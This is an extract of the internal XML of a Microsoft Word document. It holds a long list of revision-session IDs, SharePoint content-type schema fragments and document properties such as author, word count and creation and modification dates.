    <w:rsid w:val="003D0C91"/>
    <w:rsid w:val="003D7DBB"/>
    <w:rsid w:val="003E1F2E"/>
    <w:rsid w:val="003F35DC"/>
    <w:rsid w:val="00400A6C"/>
    <w:rsid w:val="004032F7"/>
    <w:rsid w:val="00405BD4"/>
    <w:rsid w:val="00415F6D"/>
    <w:rsid w:val="004223F9"/>
    <w:rsid w:val="00422885"/>
    <w:rsid w:val="0042572F"/>
    <w:rsid w:val="00427B60"/>
    <w:rsid w:val="004332CF"/>
    <w:rsid w:val="00435C64"/>
    <w:rsid w:val="00435DCA"/>
    <w:rsid w:val="00437531"/>
    <w:rsid w:val="004478F0"/>
    <w:rsid w:val="00447AAA"/>
    <w:rsid w:val="00447FAA"/>
    <w:rsid w:val="00453062"/>
    <w:rsid w:val="00464A86"/>
    <w:rsid w:val="0047287D"/>
    <w:rsid w:val="00475F58"/>
    <w:rsid w:val="00476312"/>
    <w:rsid w:val="00486435"/>
    <w:rsid w:val="004A7408"/>
    <w:rsid w:val="004B05F8"/>
    <w:rsid w:val="004C2128"/>
    <w:rsid w:val="004D217E"/>
    <w:rsid w:val="004E5C3C"/>
    <w:rsid w:val="004F5FE7"/>
    <w:rsid w:val="00503CA5"/>
    <w:rsid w:val="005057A6"/>
    <w:rsid w:val="00513340"/>
    <w:rsid w:val="00515C75"/>
    <w:rsid w:val="0052236E"/>
    <w:rsid w:val="005266FC"/>
    <w:rsid w:val="00544B90"/>
    <w:rsid w:val="00551B71"/>
    <w:rsid w:val="005617CB"/>
    <w:rsid w:val="005629EA"/>
    <w:rsid w:val="00570219"/>
    <w:rsid w:val="0057640E"/>
    <w:rsid w:val="00577F07"/>
    <w:rsid w:val="00582E87"/>
    <w:rsid w:val="0059367B"/>
    <w:rsid w:val="00596E4F"/>
    <w:rsid w:val="005A2195"/>
    <w:rsid w:val="005A7844"/>
    <w:rsid w:val="005B2854"/>
    <w:rsid w:val="005B3354"/>
    <w:rsid w:val="005C2DC7"/>
    <w:rsid w:val="005C3E06"/>
    <w:rsid w:val="005C4AAF"/>
    <w:rsid w:val="005D0F01"/>
    <w:rsid w:val="005D194E"/>
    <w:rsid w:val="005D533D"/>
    <w:rsid w:val="00605B29"/>
    <w:rsid w:val="006073A7"/>
    <w:rsid w:val="006102E5"/>
    <w:rsid w:val="00624D61"/>
    <w:rsid w:val="00627BBE"/>
    <w:rsid w:val="00637CF9"/>
    <w:rsid w:val="006411EC"/>
    <w:rsid w:val="00641E89"/>
    <w:rsid w:val="00642513"/>
    <w:rsid w:val="00644C0C"/>
    <w:rsid w:val="00651269"/>
    <w:rsid w:val="0065796D"/>
    <w:rsid w:val="00657D64"/>
    <w:rsid w:val="00662775"/>
    <w:rsid w:val="006806D8"/>
    <w:rsid w:val="00695FBA"/>
    <w:rsid w:val="006978A4"/>
    <w:rsid w:val="006B3A56"/>
    <w:rsid w:val="006B65EF"/>
    <w:rsid w:val="006C1224"/>
    <w:rsid w:val="006D07AA"/>
    <w:rsid w:val="006F2793"/>
    <w:rsid w:val="006F2B3D"/>
    <w:rsid w:val="00703B66"/>
    <w:rsid w:val="007142A5"/>
    <w:rsid w:val="0072615E"/>
    <w:rsid w:val="007418E7"/>
    <w:rsid w:val="0076726F"/>
    <w:rsid w:val="0077160C"/>
    <w:rsid w:val="00774E9A"/>
    <w:rsid w:val="007753FD"/>
    <w:rsid w:val="00787C99"/>
    <w:rsid w:val="00791FEE"/>
    <w:rsid w:val="007B3062"/>
    <w:rsid w:val="007C3008"/>
    <w:rsid w:val="007C3F44"/>
    <w:rsid w:val="007C43F1"/>
    <w:rsid w:val="007D269C"/>
    <w:rsid w:val="007D5C42"/>
    <w:rsid w:val="007D5CCE"/>
    <w:rsid w:val="007D6D8B"/>
    <w:rsid w:val="007D74BD"/>
    <w:rsid w:val="007D7BF5"/>
    <w:rsid w:val="007E6308"/>
    <w:rsid w:val="00802D00"/>
    <w:rsid w:val="00803693"/>
    <w:rsid w:val="008136D3"/>
    <w:rsid w:val="00821589"/>
    <w:rsid w:val="00827127"/>
    <w:rsid w:val="00835118"/>
    <w:rsid w:val="00840174"/>
    <w:rsid w:val="00840873"/>
    <w:rsid w:val="00841C7E"/>
    <w:rsid w:val="008435CA"/>
    <w:rsid w:val="0084416B"/>
    <w:rsid w:val="0084638D"/>
    <w:rsid w:val="00853334"/>
    <w:rsid w:val="00854451"/>
    <w:rsid w:val="008568F6"/>
    <w:rsid w:val="008661D9"/>
    <w:rsid w:val="008675BD"/>
    <w:rsid w:val="0088020E"/>
    <w:rsid w:val="00885E25"/>
    <w:rsid w:val="00892A86"/>
    <w:rsid w:val="00893D0A"/>
    <w:rsid w:val="008A7E41"/>
    <w:rsid w:val="008B056F"/>
    <w:rsid w:val="008B3EFC"/>
    <w:rsid w:val="008C7C64"/>
    <w:rsid w:val="008D3B33"/>
    <w:rsid w:val="008E2400"/>
    <w:rsid w:val="008E333E"/>
    <w:rsid w:val="008E4231"/>
    <w:rsid w:val="0090354E"/>
    <w:rsid w:val="009042C6"/>
    <w:rsid w:val="0090549F"/>
    <w:rsid w:val="00905E15"/>
    <w:rsid w:val="00916E4B"/>
    <w:rsid w:val="00920A8C"/>
    <w:rsid w:val="00923D09"/>
    <w:rsid w:val="009243AB"/>
    <w:rsid w:val="00927A4F"/>
    <w:rsid w:val="00932FFC"/>
    <w:rsid w:val="00934C57"/>
    <w:rsid w:val="00943CF9"/>
    <w:rsid w:val="00946218"/>
    <w:rsid w:val="00952F32"/>
    <w:rsid w:val="00961D01"/>
    <w:rsid w:val="0097224F"/>
    <w:rsid w:val="0097625A"/>
    <w:rsid w:val="0098280B"/>
    <w:rsid w:val="00986979"/>
    <w:rsid w:val="009874F1"/>
    <w:rsid w:val="00992E08"/>
    <w:rsid w:val="009A2EBA"/>
    <w:rsid w:val="009A33CD"/>
    <w:rsid w:val="009A5173"/>
    <w:rsid w:val="009A7BD1"/>
    <w:rsid w:val="009B2303"/>
    <w:rsid w:val="009C002C"/>
    <w:rsid w:val="009C3F62"/>
    <w:rsid w:val="009D3E4B"/>
    <w:rsid w:val="009D4780"/>
    <w:rsid w:val="009D4D1A"/>
    <w:rsid w:val="009E1E50"/>
    <w:rsid w:val="009F300A"/>
    <w:rsid w:val="009F3A3C"/>
    <w:rsid w:val="00A14F3B"/>
    <w:rsid w:val="00A17DFB"/>
    <w:rsid w:val="00A41FF4"/>
    <w:rsid w:val="00A50A55"/>
    <w:rsid w:val="00A64F95"/>
    <w:rsid w:val="00A70609"/>
    <w:rsid w:val="00A72834"/>
    <w:rsid w:val="00A77D0D"/>
    <w:rsid w:val="00A815D6"/>
    <w:rsid w:val="00A92D19"/>
    <w:rsid w:val="00A937E5"/>
    <w:rsid w:val="00AA3070"/>
    <w:rsid w:val="00AB75D4"/>
    <w:rsid w:val="00AC1078"/>
    <w:rsid w:val="00AC1C6A"/>
    <w:rsid w:val="00AE0732"/>
    <w:rsid w:val="00B0056B"/>
    <w:rsid w:val="00B03754"/>
    <w:rsid w:val="00B16094"/>
    <w:rsid w:val="00B238E8"/>
    <w:rsid w:val="00B31BAF"/>
    <w:rsid w:val="00B53C62"/>
    <w:rsid w:val="00B57D09"/>
    <w:rsid w:val="00B60E1A"/>
    <w:rsid w:val="00B63504"/>
    <w:rsid w:val="00B76593"/>
    <w:rsid w:val="00B80728"/>
    <w:rsid w:val="00B8751C"/>
    <w:rsid w:val="00B97B1C"/>
    <w:rsid w:val="00BB1AF0"/>
    <w:rsid w:val="00BC255A"/>
    <w:rsid w:val="00BC3DD5"/>
    <w:rsid w:val="00BC4588"/>
    <w:rsid w:val="00BD113B"/>
    <w:rsid w:val="00BD170B"/>
    <w:rsid w:val="00BD3D3D"/>
    <w:rsid w:val="00BF1809"/>
    <w:rsid w:val="00BF622D"/>
    <w:rsid w:val="00BF67A7"/>
    <w:rsid w:val="00BF7635"/>
    <w:rsid w:val="00C0201F"/>
    <w:rsid w:val="00C17154"/>
    <w:rsid w:val="00C260DA"/>
    <w:rsid w:val="00C36895"/>
    <w:rsid w:val="00C36ABE"/>
    <w:rsid w:val="00C4563C"/>
    <w:rsid w:val="00C5303A"/>
    <w:rsid w:val="00C570A8"/>
    <w:rsid w:val="00C61E48"/>
    <w:rsid w:val="00C72B0D"/>
    <w:rsid w:val="00C74F2B"/>
    <w:rsid w:val="00C77623"/>
    <w:rsid w:val="00C84AF3"/>
    <w:rsid w:val="00C87135"/>
    <w:rsid w:val="00C93836"/>
    <w:rsid w:val="00C950F7"/>
    <w:rsid w:val="00CA6653"/>
    <w:rsid w:val="00CB03F9"/>
    <w:rsid w:val="00CB08BE"/>
    <w:rsid w:val="00CB451E"/>
    <w:rsid w:val="00CB4DF6"/>
    <w:rsid w:val="00CB62F8"/>
    <w:rsid w:val="00CB7468"/>
    <w:rsid w:val="00CB75E8"/>
    <w:rsid w:val="00CC003E"/>
    <w:rsid w:val="00CC2272"/>
    <w:rsid w:val="00CD50A9"/>
    <w:rsid w:val="00CD715F"/>
    <w:rsid w:val="00CF5DFB"/>
    <w:rsid w:val="00D17F18"/>
    <w:rsid w:val="00D239C1"/>
    <w:rsid w:val="00D27BF0"/>
    <w:rsid w:val="00D34211"/>
    <w:rsid w:val="00D3533E"/>
    <w:rsid w:val="00D3642D"/>
    <w:rsid w:val="00D432D1"/>
    <w:rsid w:val="00D472D1"/>
    <w:rsid w:val="00D51B4A"/>
    <w:rsid w:val="00D52E88"/>
    <w:rsid w:val="00D54F09"/>
    <w:rsid w:val="00D54F1F"/>
    <w:rsid w:val="00D63505"/>
    <w:rsid w:val="00D6371F"/>
    <w:rsid w:val="00D66F00"/>
    <w:rsid w:val="00D84809"/>
    <w:rsid w:val="00D87F16"/>
    <w:rsid w:val="00D94346"/>
    <w:rsid w:val="00DA25BD"/>
    <w:rsid w:val="00DA5C95"/>
    <w:rsid w:val="00DB007C"/>
    <w:rsid w:val="00DB6FF9"/>
    <w:rsid w:val="00DC0B66"/>
    <w:rsid w:val="00DC2E95"/>
    <w:rsid w:val="00DE2C89"/>
    <w:rsid w:val="00DF5D0B"/>
    <w:rsid w:val="00DF72B5"/>
    <w:rsid w:val="00E03D3F"/>
    <w:rsid w:val="00E1118D"/>
    <w:rsid w:val="00E220F0"/>
    <w:rsid w:val="00E31755"/>
    <w:rsid w:val="00E45A45"/>
    <w:rsid w:val="00E477B4"/>
    <w:rsid w:val="00E5392C"/>
    <w:rsid w:val="00E5425D"/>
    <w:rsid w:val="00E54CAA"/>
    <w:rsid w:val="00E54DE8"/>
    <w:rsid w:val="00E55010"/>
    <w:rsid w:val="00E6170A"/>
    <w:rsid w:val="00E642BD"/>
    <w:rsid w:val="00E728CC"/>
    <w:rsid w:val="00E81B62"/>
    <w:rsid w:val="00E82D72"/>
    <w:rsid w:val="00E90545"/>
    <w:rsid w:val="00E9369B"/>
    <w:rsid w:val="00EA744F"/>
    <w:rsid w:val="00EB29FE"/>
    <w:rsid w:val="00EC1FDF"/>
    <w:rsid w:val="00EC753E"/>
    <w:rsid w:val="00ED579D"/>
    <w:rsid w:val="00ED7B06"/>
    <w:rsid w:val="00EF2B6B"/>
    <w:rsid w:val="00EF2B89"/>
    <w:rsid w:val="00EF56CF"/>
    <w:rsid w:val="00F22CE0"/>
    <w:rsid w:val="00F22F74"/>
    <w:rsid w:val="00F25F70"/>
    <w:rsid w:val="00F26B0D"/>
    <w:rsid w:val="00F305F9"/>
    <w:rsid w:val="00F327CE"/>
    <w:rsid w:val="00F361E6"/>
    <w:rsid w:val="00F36B0D"/>
    <w:rsid w:val="00F37046"/>
    <w:rsid w:val="00F45D1A"/>
    <w:rsid w:val="00F47E89"/>
    <w:rsid w:val="00F52F83"/>
    <w:rsid w:val="00F558EA"/>
    <w:rsid w:val="00F635C8"/>
    <w:rsid w:val="00F63887"/>
    <w:rsid w:val="00F668F8"/>
    <w:rsid w:val="00F679D8"/>
    <w:rsid w:val="00F87339"/>
    <w:rsid w:val="00F943D3"/>
    <w:rsid w:val="00FA03B1"/>
    <w:rsid w:val="00FA492D"/>
    <w:rsid w:val="00FA5AB2"/>
    <w:rsid w:val="00FA5EA1"/>
    <w:rsid w:val="00FB0D31"/>
    <w:rsid w:val="00FB1ABE"/>
    <w:rsid w:val="00FB31ED"/>
    <w:rsid w:val="00FB32DB"/>
    <w:rsid w:val="00FC04E2"/>
    <w:rsid w:val="00FC76B9"/>
    <w:rsid w:val="00FD0BFF"/>
    <w:rsid w:val="00FD17D0"/>
    <w:rsid w:val="00FE1E53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028BC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C0C605BB-3ED6-0346-8BC9-D78B1A5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29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29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2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42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1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473001E400FB41A8651FF06388E48B" ma:contentTypeVersion="3" ma:contentTypeDescription="Crée un document." ma:contentTypeScope="" ma:versionID="be35d82457042233532265d36802f562">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="21a0dda6-a354-4c5d-9a66-03fd9702a93e" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="1de6def1b7007ac58951f2003fbd7eac" ns2:_="">
    <xsd:import namespace="21a0dda6-a354-4c5d-9a66-03fd9702a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0dda6-a354-4c5d-9a66-03fd9702a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AB8DB2-A568-42F2-BACA-69103D70B9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A28CC-3B11-4014-B808-CC92F0CB2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0dda6-a354-4c5d-9a66-03fd9702a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80FE94-55B8-47BC-AD9B-9D6F813C9F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1379</Words>
  <Characters>7586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STREBELLE</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sébastien STREBELLE</cp:lastModifiedBy>
  <cp:revision>384</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-10T07:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-02T13:23:00Z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0x0101000C473001E400FB41A8651FF06388E48B</vt:lpwstr>
  </property>
</Properties>
</file>